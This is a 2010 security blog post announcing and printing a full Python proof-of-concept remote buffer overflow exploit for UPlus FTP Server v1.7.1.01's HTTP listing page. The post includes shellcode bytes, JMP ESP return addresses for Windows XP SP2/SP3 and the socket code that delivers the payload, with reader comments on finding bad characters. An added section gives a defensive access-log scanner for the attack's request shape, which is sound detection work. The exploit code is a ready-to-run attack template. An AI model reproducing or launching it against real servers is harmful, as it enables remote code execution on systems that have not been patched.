Thursday, July 29, 2010

UPlus FTP Server v1.7.1.0.1 remote buffer overflow exploit published

Hi All,

Posted another remote code execution exploit on Exploit-db an hour back. It is published now :-)

###
#!/usr/bin/python
import socket,sys,base64
print """
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
    Discovered by : Karn Ganeshen                         
    Author : Karn Ganeshen / corelanc0d3r
                                                    
    KarnGaneshen [aT] gmail [d0t] com                         
    http://ipositivesecurity.blogspot.com
                                                
    Greetz out to:  corelanc0d3r
                    http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
"""
# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010
if len(sys.argv) != 5:
    print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"
    sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]
auth = base64.b64encode(user+":"+pwd)
buf="A"*1963
buf+="\x90"*179
# 165 bytes Calc.exe shellcode / badchars identified and excluded
buf+=("\xd9\xca\x29\xc9\xb1\x24\xbf\x3f\xc7\x66\x9f\xd9\x74\x24\xf4\x5e"
"\x31\x7e\x17\x03\x7e\x17\x83\xf9\xc3\x84\x6a\xf9\x24\x0c\x95\x01"
"\xb5\x06\xd0\x3d\x3e\x64\xde\x45\x41\x7a\x6b\xfa\x59\x0f\x33\x24"
"\x5b\xe4\x85\xaf\x6f\x71\x14\x41\xbe\x45\x8e\x31\x45\x85\xc5\x4e"
"\x87\xcc\x2b\x51\xc5\x3a\xc7\x6a\x9d\x98\x2c\xf9\xf8\x6a\x73\x25"
"\x02\x86\xea\xae\x08\x13\x78\xef\x0c\xa2\x95\x84\x31\x2f\x68\x71"
"\xc0\x73\x4f\x81\x10\xba\x4f\xed\x1d\xfd\x7f\x68\xe1\x86\x73\xf9"
"\xa2\x7a\x07\x8d\x3e\x2e\x9c\x05\x37\xdb\xaa\x5e\xc7\xab\xad\x60"
"\xc8\x40\xc5\x5c\x97\x67\xe0\xfc\x71\x01\xf4\x7f\xbd\x6a\x55\x17"
"\xce\x07\x51\xb8\x46\x80\xa4\xcc\x99\xe7\xa7\x37\xc6\x66\x34\xd4"
"\x27\x0c\xbc\x7f\x38")
buf+="\x90"*15
#[ XP SP2 ] -> "\x78\x16\xF3\x77"    #0x77F31678  JMP ESP
buf+="\x78\x16\xF3\x77"
#[ XP SP3 ] -> "\x3F\x71\x49\x7E"   #0x7E49713F  JMP ESP
#buf+="\x3F\x71\x49\x7E"
buf+="\x90"*30
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x50\xc3"                 #PUSH EAX + RET
print "[+] Launching exploit against " + target + "..."
head = "GET /list.html?path="+buf+" HTTP/1.1 \r\n"
head += "Host: \r\n"
head += "Authorization: Basic "+auth+"\r\n"
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + "\r\n")
    print "[!] Payload sent..."
    s.close()
except:
    print "[x] Error!"

I actually missed out on specifying the bad chars I excluded while generating the payload, so here they are:
\x0a \x20 \x25 \x26
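From the defender's side, the request the PoC sends has a recognisable shape: a `path=` parameter a couple of kilobytes long, dominated by one repeated filler byte, followed by a NOP sled of bytes outside printable ASCII. The following check is an added example, not code from the original post; it scans HTTP request lines (as they would appear in an access log) for that shape, and the length and run thresholds are assumptions chosen for illustration.

```python
import re

# Assumed thresholds, not values from the advisory: a real directory path for the
# server's HTTP listing is short, while the PoC sends ~2,200 bytes in "path=".
MAX_PATH_LEN = 512
MAX_REPEAT_RUN = 64

REQUEST_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d')
PATH_PARAM_RE = re.compile(r'[?&]path=([^&\s]*)')

def inspect_request_line(line):
    """Return the reasons a request line looks like the overflow (empty list if clean)."""
    m = REQUEST_RE.match(line)
    if not m:
        return ["request line does not parse"]
    p = PATH_PARAM_RE.search(m.group("target"))
    if not p:
        return []                      # no path= parameter, nothing to inspect
    value = p.group(1)
    reasons = []
    if len(value) > MAX_PATH_LEN:
        reasons.append("path parameter is %d bytes (limit %d)" % (len(value), MAX_PATH_LEN))
    run = re.search(r'(.)\1{%d,}' % (MAX_REPEAT_RUN - 1), value)
    if run:
        reasons.append("run of %d repeated %r bytes (filler/NOP sled)" % (len(run.group(0)), run.group(1)))
    non_printable = sum(1 for c in value if not 0x20 <= ord(c) <= 0x7e)
    if non_printable:
        reasons.append("%d characters outside printable ASCII (binary payload)" % non_printable)
    return reasons

def scan_access_log(lines):
    """Run the check over request lines; return (line_number, reasons) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = inspect_request_line(line)
        if reasons:
            hits.append((n, reasons))
    return hits

# Constructed sample: two ordinary listing requests and one shaped like the PoC
# (filler and NOP sled only, no shellcode).
SAMPLE_LINES = [
    "GET /list.html?path=/pub/incoming HTTP/1.1",
    "GET /list.html?path=/pub/docs&sort=name HTTP/1.1",
    "GET /list.html?path=" + "A" * 1963 + "\x90" * 179 + " HTTP/1.1",
]

if __name__ == "__main__":
    for n, reasons in scan_access_log(SAMPLE_LINES):
        print("line %d: %s" % (n, "; ".join(reasons)))
```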

I should be able to post a video showing how this exploit was prepared & tested. Watch this space!

Shoutz to corelanc0d3r! :)

You may also check it out here:

Update: Advisory published on Secunia -> http://secunia.com/advisories/40771

Best Regards.

2 comments:

  1. hi
    thanks for this exploit but I have some questions about bad chars :)

    Do the bad chars depend on the OS or the program?
    And how can I find them?

    best wishes
  2. Hi,

    Identifying bad chars is an important aspect of writing an exploit. There are certain chars which are always considered to be bad chars on any OS or app, e.g. \x00, the null byte, which would stop the execution flow.

    Also, there are chars specific to the app which may break our shellcode / exploit. These application-specific bad chars need to be identified & excluded for each app.

    Peter has written a nice tutorial on this subject ->

    http://www.corelan.be:8800/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/

    Please go through it and feel free to ask questions.

    Best Regards.


Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.